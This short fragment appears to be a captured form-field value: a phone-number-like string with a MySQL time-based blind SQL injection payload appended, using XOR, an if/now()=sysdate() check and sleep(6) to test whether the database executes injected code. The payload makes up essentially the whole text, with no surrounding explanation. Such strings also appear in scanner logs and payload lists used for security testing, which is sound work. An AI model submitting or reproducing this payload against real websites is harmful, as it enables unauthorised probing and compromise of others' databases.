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555-666-06060"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z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